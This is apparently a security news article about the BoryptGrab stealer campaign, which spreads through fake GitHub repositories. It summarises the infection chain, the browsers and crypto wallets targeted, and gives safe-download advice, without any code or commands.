Cybercriminals are now using fake GitHub repositories to spread dangerous malware known as BoryptGrab stealer. This new cybersecurity threat targets users who search for free software, game cheats, or productivity tools online. By taking advantage of the trust people place in GitHub, attackers are able to distribute malicious files that steal sensitive information.
Security researchers have identified more than 100 public repositories connected to this campaign. Many of these repositories look legitimate and use popular keywords to appear in search engine results. This makes it easier for unsuspecting users to download infected files.
The operation has reportedly been active since 2025, and some of the repositories include Russian-language comments and code patterns. This suggests that the threat actors behind the campaign may be Russian-speaking.
How the Fake GitHub Malware Attack Works
The attack starts when a user downloads a ZIP file from a fake repository. The file usually appears to be a useful program such as a gaming tool, media software, or system utility.
Once the archive is opened, the malware begins a multi-stage attack process.
Some files include an executable that uses DLL sideloading to run hidden malicious code. Other versions contain a VBS downloader that executes obfuscated PowerShell commands. These commands connect to a remote server and download additional malware components.
In some cases, the malware also attempts to add Microsoft Defender exclusions, which helps it avoid detection by security software.
After the first stage, different payloads may be installed on the infected system.
| Malware Component | Purpose |
|---|---|
| BoryptGrab | Main data stealer targeting browsers and wallets |
| Vidar Variant | Additional information stealing malware |
| HeaconLoad | Golang-based downloader used to fetch payloads |
| TunnesshClient | Backdoor that creates reverse SSH tunnels |
This modular design allows attackers to change payloads depending on the victim.
Data Theft Targeting Browsers and Crypto Wallets
The main malware in this campaign, BoryptGrab, is written in C/C++ and is designed to steal large amounts of data.
It targets major web browsers including:
- Chrome
- Edge
- Brave
- Opera
- Firefox
- Vivaldi
- Chromium-based browsers
- Yandex Browser
The malware can extract saved passwords, browsing data, and stored credentials. It also uses techniques to bypass Chrome’s encryption protections, allowing attackers to access sensitive information.
Cryptocurrency wallets are another major target. The malware searches for both desktop wallet applications and browser extensions.
Some targeted wallets include:
- Exodus
- Electrum
- Ledger
- Trezor
- Atomic Wallet
- Binance Wallet
- Wasabi Wallet
- Bitcoin Core
- Ethereum wallets
In addition to wallet data, the malware can collect Telegram and Discord data, system details, screenshots, and files stored in common folders.
Once the data is collected, it is compressed and uploaded to attacker-controlled servers.
Why This Campaign Is Dangerous
This campaign highlights how cybercriminals are combining several tactics to scale their attacks. These include SEO manipulation, fake GitHub projects, modular malware loaders, and cryptocurrency theft tools.
Because the repositories appear legitimate and rank well in search results, many users may unknowingly download infected files.
Users looking for free tools or cracked software are especially at risk.
How Users Can Stay Safe
To avoid becoming a victim of malware campaigns like BoryptGrab:
- Download software only from trusted official sources
- Carefully review GitHub repositories before downloading files
- Avoid downloading unknown ZIP archives from public projects
- Keep antivirus and system security tools updated
- Be cautious of repositories with very little documentation or suspicious comments
Fake GitHub repositories spreading BoryptGrab malware show how attackers are evolving their tactics to target everyday users and cryptocurrency holders. Staying aware of these threats and practicing safe download habits can help protect your data and digital assets.
